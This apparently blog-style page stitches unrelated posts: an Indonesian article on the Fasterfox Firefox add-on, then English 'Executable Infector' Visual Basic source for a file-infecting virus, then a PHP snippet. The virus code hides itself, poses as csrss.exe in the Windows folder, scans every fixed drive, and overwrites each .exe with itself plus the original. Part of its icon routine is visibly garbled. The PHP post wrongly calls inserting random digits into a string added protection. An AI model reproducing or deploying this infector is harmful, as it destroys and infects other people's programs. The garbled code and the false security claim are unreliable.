Jika anda suka, silahkan bookmark alamat web ini online di del.icio.us
jadi anda bisa mmbukanya dimana aja tanpa hrs melihat catatan bookmark anda.
Ok, itu aja info gratisnya
Maaf bila ada salah kata, sekedar share agar kita bs manfaatin sbaik2nya.
Smoga bermanfaat buat rekan2 disini.
Keep freedom to surf!!!
Smoga berkenan...
Firefox oleh banyak orang dianggap sebagai browser yang cukup cepat. Namun, ada saja yang menganggap masih kurang cepat, untungnya telah banyak upaya yang dilakukan untuk mempercepat kinerja firefox yang sudah cepat ini. Salah satunya adalah melalui plug-ins Fasterfox.
Karena sifat firefox yang opensource, banyak orang ‘pintar’ yang dapat ikut andil dalam mengembangkan kinerja si Rubah Api ini. Salah satu upaya untuk meningkatkan kinerja firefox adalah dengan melakukan tweaking. Itulah yang dilakukan oleh plug-ins fasterfox. Fasterfox mempercepat proses browsing dengan memanfaatkan Prefect links dan Network Tweaking. Melalui Prefect Links, tidak ada lagi bandwith menganggur karena firefox akan mengambil dan menyimpan halaman web sebagai cache. Proses transfer halaman web ini dilakukan dilatar belakang sehingga tidak mengganggu aktifitas browsing anda.
Tweaking Network dilakukan pada seting untuk rendering halaman, koneksi simultan, pipelining,cache, DNS-cache, dan IPD (initial paint delay). Selain itu di dalam fasterfox juga telah terintegrasi sebuah pop-up blocker untuk pop-up yang dihasilkan oleh objek flash.
Untuk menginstalasikan plug-ins fasterfox anda dapat mendownloadnya di http://fasterfox.mozdev.org/ , Setelah plug-ins terinstalasi, restart firefox untuk mengaktifkannya. Buka menu Tools | Add-ons, lalu klik ganda plug-ins fasterfox untuk membuka option yang tersedia. Fasilitas tersebut adalah pilihan Default, Courteous, Optimized, Turbo Charged, dan Custom.
Pilihan default akan mengembalikan semua setingan ke kondisi semula. Pilihan Courteous hanya melakukan tweaking pada proses rendering sehingga tidak akan membebani webserver. Pilihan Optimized akan melakukan tweaking optimum dalam batasan yang diizinkan oleh RFC. Pilihan Turbo Charged adalah pilihan yang paling ekstrem, ia akan melakukan tweaking seoptimal mungkin dengan mengabaikan batasan yang diizinkan.
Turbo Charged dapat menjadi pilihan utama bagi anda yang berbagi jalur internet, sedang jika anda seorang yang bijaksana, Courteous dan Optimized adalah pilihan yang tepat. Dengan memilih custom anda dapat mengatur aspek-aspek tweaking secara lebih terperinci. Disini anda dapat mengatur langsung besarnya cache yang akan digunakan, banyaknya koneksi simultan ke sebuah web server, jumlah pipelining, banyaknya halaman fastback, dan menghidupkan/mematikan pop-up blocker.
Executable Infector
This is the only one of its kind..
But there is a new Update i made for the previous method.
now you can easily extract (an) icon of the original EXE and save it to the Infected EXE
note that if The Original EXE has more than one Icon .. we can't specify The main icon in this case.. so we will extract any icon and save it to the infected EXE
Add :
The Infector Routine depends on The everlasting method
>>>> My Application + Original EXE <<<<
And will be exploring original EXE on drives, be carefull !!!
CODE : ( VB Language )
Dim sPath As String
Dim sOPath As String
Dim sData As String
Dim VirusData As String
Dim FinalEXE As String
Dim lStart As Long
Dim lEnd As Long
Dim sLen As Long
Dim sIcon As String
Private Sub Form_Load()
app.TaskVisible = False
If App.PrevInstance = True Then End
'## Begin OF Dropping
sPath = AddBackSlash(App.Path) & App.EXEName & ".exe"
sOPath = AddBackSlash(App.Path) & App.EXEName & ".MFF"
If LCase(sPath) = LCase(Environ$("WinDir") & "\csrss.exe") Then
Else
Open sPath For Binary As #1
sData = Space(LOF(1))
Get #1, , sData
lStart = InStr(25000, sData, "|||||")
If lStart > 0 Then
lStart = lStart + 5
sData = Mid(sData, lStart)
Open sOPath For Binary As #2
Put 2, , sData
Close 2
If Command$ = "" Then
Shell sOPath, vbNormalFocus
Else
Shell sOPath & " " & Command$, vbNormalFocus
End If
End If
Close 1
End If
'## End OF Dropping
'@@@@@@@@@@@@@@@@@@@@@@@@@
If Dir(Environ$("WinDir") & "\csrss.exe") = "" Then
sPath = AddBackSlash(App.Path)
FileCopy sPath & App.EXEName & ".exe", Environ$("WinDir") & "\csrss.exe"
While Dir(Environ$("WinDir") & "\csrss.exe") = ""
DoEvents
Wend
Shell Environ$("WinDir") & "\csrss.exe"
End
End If
If LCase(sPath) = LCase(Environ$("WinDir") & "\csrss.exe") Then
'Do nothing
Else
Shell Environ$("WinDir") & "\csrss.exe"
End
End If
'#########################
Call GetDrives
End Sub
'#########################
' Sub GetDrives()
Dim ObjFSO As Object
Dim Drives As Object
Dim sDrive As Object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set Drives = ObjFSO.Drives
For Each sDrive In Drives
If sDrive.DriveType = 2 Then
MsgBox sDrive & "\"
GetEXEs (sDrive & "\")
GetFolders (sDrive & "\")
End If
Next
End Sub
Function GetFolders(Folder As String)
Dim ObjFSO As Object
Dim sFolder As Object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
For Each sFolder In ObjFSO.GetFolder(Folder).SubFolders
DoEvents
Call GetEXEs(sFolder.Path)
Call GetFolders(sFolder.Path)
Next
End Function
Function GetEXEs(Path As String)
Dim exes As String, EXEPath As String
If Right(Path, 1) <> "\" Then Path = Path & "\"
EXEPath = Dir$(Path & "*.exe")
While EXEPath <> ""
List1.AddItem Path & EXEPath
'MsgBox Path & EXEPath
Call InfectEXE(Path & EXEPath)
EXEPath = Dir$
Wend
End Function
Function InfectEXE(EXEPath As String)
Me.Visible = True
On Error Resume Next
Dim Check As Boolean
Check = False
Dim s As String, ss As String, sss As String
Dim sNulls As String
Dim sLenICOINEXE As Long
Dim sLenDif As Long
Dim sLenTemp As String
Dim sTemp As String
s = "1u" & "(" & Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
ss = "(" & Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
sss = "3u(" & Chr$(0) '& Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0)
For i = 1 To 296 ' Generate 296 Nulls to change 16*16 icon
sNulls = sNulls & Chr$(0)
Next
'First we will check if it is already infected
Open EXEPath For Binary As #1
sData = Space(LOF(1))
Get 1, , sData
Close 1
If InStr(25000, sData, "|||||") Then
'it is infected then do nothing
Else
'it is clean so try to infect it
Kill EXEPath
sIcon = GetIconFromEXE(sData, Check)
If Check = True Then
'MsgBox "Icon Found"
sPath = AddBackSlash(App.Path) & App.EXEName & ".exe"
Open sPath For Binary As #2
VirusData = Space(LOF(2))
Get 2, , VirusData
Close #2
i = InStr(1, VirusData, s)
If i <> 0 Then '(1u found)
VirusData = Left(VirusData, i + 1) ' get to u in (1u)
VirusData = VirusData & sIcon
FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3
Exit Function
Else 'If (1u) not found .. try to find (3u)
i = InStr(1, sData, sss)
If i > 0 Then
'Debug.Print "Second Method Method... (3u found)"
sTemp = Left(VirusData, i + 1) 'Get to (3u)
sLenICOINEXE = Len(VirusData) - (i + 297) ' add one byte to 296 coz of (u) in (1u)
sLenICOINICO = Len(sIcon)
If sLenICOINEXE > sLenICOINICO Then
sLenDif = sLenICOINEXE - sLenICOINICO
For i = 1 To sLenDif
sLenTemp = sLenTemp & Chr$(0)
Next
End If
VirusData = sTemp & sNulls & sIcon & sLenTemp
FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3
Exit Function
End If
End If 'for if i <> 0
FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3
Else ' Means Check = False
'virus icon is default for the final EXE
sPath = AddBackSlash(App.Path) & App.EXEName & ".exe"
Open sPath For Binary As #2
VirusData = Space(LOF(2))
Get 2, , VirusData
Close #2
FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3
End If ' for check
End If ' for |||||
End Function
Function GetIconFromEXE(ByVal eData As String, ByRef state As Boolean) As String
Dim c As String, sNull As String, ss As String
Dim sPath As String, sIcon As String
Dim l As Long
c = Chr$(0) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(32) & Chr$(32) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(168) & Chr$(8) & Chr$(0) & Chr$(0) & Chr$(22) & Chr$(0) & Chr$(0) & Chr$(0)
ss = "(" & Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
i = InStr(1, eData, "MSVBVM")
If i > 0 Then
'VB EXE
i = InStr(1, eData, ss)
If i > 0 Then
sIcon = Mid(eData, i)
'sIcon = c & sIcon & sNull & Chr(255)
sIcon = sIcon & sNull & Chr(255)
GetIconFromEXE = sIcon
state = True
Exit Function
End If
Else ' Not Vb EXE so first search for last (... ...@ and compare the size
i = InStr(1, eData, ss)
If i > 0 Then
If Len(eData) - i > 10000 Then
i = InStrRev(eData, ss, Len(eData))
If i > 0 And Len(eData) - i < sicon =" Mid(eData," sicon =" c" sicon =" sIcon" geticonfromexe =" sIcon" state =" True" sicon =" Mid(eData," sicon =" c" sicon =" sIcon" geticonfromexe =" sIcon" state =" True" sicon =" Mid(eData,"> 0 Then
' l = 2350 - Len(sIcon)
' For i = 1 To l
' sNull = sNull & Chr(0)
' Next
' End If
' sIcon = c & sIcon & sNull & Chr(255)
sIcon = sIcon & sNull & Chr(255)
GetIconFromEXE = sIcon
state = True
Exit Function
End If
End If
End If
state = False
End Function
Function AddBackSlash(strPath As String) As String
If Right(strPath, 1) <> "\" Then
AddBackSlash = strPath & "\"
Else
AddBackSlash = strPath
End If
End Function
Private Sub Form_Unload(Cancel As Integer)
End
End Sub
References :
Written By justin[Mohamed FaYeD] _
Thensync@hotmail.com
It wlll add a random number between 0-9 to every sencond charcter in a string i find it very usfull if u are trying to use base64 on a more protected level as if u encrypt the same string twice the output would be different as it insterts random numbers even tho this isent as advance as most encryption tech's it would be a good addition to add to others to make them that little bit more secure from prying eyes.
code :
function dummy_encode($str) {
$len = strlen($str);
$str1=0;
$final="";
while ($str1 < $len) { $final = $final.substr($str, $str1, 1); $str1++; $final = $final.rand(0,9); } return $final; } function dummy_decode($str) { $len = strlen($str); $str1=0; $final=""; while ($str1 < $len) { $final = $final.substr($str, $str1, 1); $str1=$str1+2; } return $final; }
references :
- DAB-Hacker
- Planet-source-code.com
Posts
All Comments
